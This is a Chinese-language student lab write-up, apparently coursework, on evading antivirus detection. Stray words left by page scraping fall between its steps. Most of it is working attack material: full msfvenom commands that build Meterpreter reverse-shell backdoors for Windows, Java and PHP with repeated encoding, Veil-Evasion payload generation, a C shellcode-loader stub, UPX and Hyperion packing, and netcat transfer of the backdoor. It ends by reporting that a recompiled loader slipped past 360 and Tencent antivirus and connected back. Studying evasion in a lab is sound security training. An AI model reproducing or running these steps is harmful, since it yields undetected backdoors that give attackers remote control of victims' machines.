目錄php
(1)殺軟是如何檢測出惡意代碼的?java
(2)免殺是作什麼?python
(3)免殺的基本方法有哪些?算法
改變特徵碼shell
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.19.129 LPORT=5230 -f exe > 20165230_backdoor.exe
放去virscan掃描,結果有點慘,有29個掃描了出來。
編程
編碼十次命令以下(用-i參數指定編碼次數):vim
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.19.129 LPORT=5230 -f exe > 20165230_back2.exe
再放去掃描,少了1個,但感受沒有多大效果。
windows
生成.jar文件夾
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.19.129 lport=5230 x> 20165230_backdoor_java.jar
數組
msfvenom生成php文件:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.19.129 lport=5230 x> 20165230_backdoor.php
安全
下面是學長博客裏的正常安裝方法:
在Kali終端中使用
sudo apt-get install veil
安裝,若遇到問題則用sudo apt-get update
和sudo apt-get upgrade
這兩個命令更新一下軟件包便可:
以後用veil
命令打開Veil,輸入y繼續安裝直至完成
在終端中使用veil
命令進入應用,輸入use evasion
進入veil-evasion
輸入use python/meterpreter/rev_tcp.py
,
而後設置回連IP(此處IP是kali)和端口,輸入generate
生成文件,接着輸入你想要payload的名字:veil_c_5230:
而後生成了可執行文件。
看看Viruscan的掃描結果怎麼樣,咦還不錯,只有15個了!
Linux平臺交叉編譯Windows應用
使用命令msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.19.129 LPORT=5230 -f c
生成一個c語言格式的shellcode數組
vim shell1.c
命令新建一個c文件,將生成的shellcode粘貼到其中,並在以後添加主函數int main() { int (*func)() = (int(*)())buf; func(); }
i686-w64-mingw32-g++ shell1.c -o shell1.exe
命令生成可執行文件1.在kali中輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.19.129 LPORT=5230 -f exe > shell1.exe注意這裏的IP地址爲控制端IP,即LinuxIP,生成後門程序 2.在Windows下執行ncat.exe -l 5230 > shell1.exe,這樣被控主機就進入了接收文件模式 3.在kali中經過nc 192.168.19.128 5230 < shell1.exe將生成的後門程序傳送到Windows主機上.注意這裏的IP爲被控主機IP,即WindowsIP
回連先ping通,而後再作是沒有問題的
仍是同樣用Viruscan掃描一下
發現並無改進啊!
用-e
指定生成shellcode的編碼方式,生成新的shellcodemsfvenom -p windows/meterpreter/reverse_https -e x86/bloxor LHOST=192.168.19.129 -f c
仍是不行!!
接下來我換了N種方式變換了主函數,從新生成了shellcode,不斷用ncat在兩臺虛擬機之間傳輸exe,依然沒用,個人心裏是崩潰的
upx是一種壓縮程序,能夠實現加殼的功能,Kali下輸入命令upx shellupx.exe -o shellupx.upxed.exe
:
再去掃一遍,emmmmm,這個殼好像也沒用
輸入命令wine hyperion.exe -v shell5.upxed.exe shell5.upxed.Hyperion.exe
進行加殼:
再去掃一遍,咦,稍微好了一點點點,不過仍是不要加殼了吧
在經歷了N次失敗後,已經快要沒有信心了,後來我以前相同的代碼在主機的Codeblocks編譯生成exe,再放去viruscan裏掃描 竟然成功了!也太神奇了吧
也沒有被殺軟殺!360和騰訊管家都開了
再回連一下,OK!!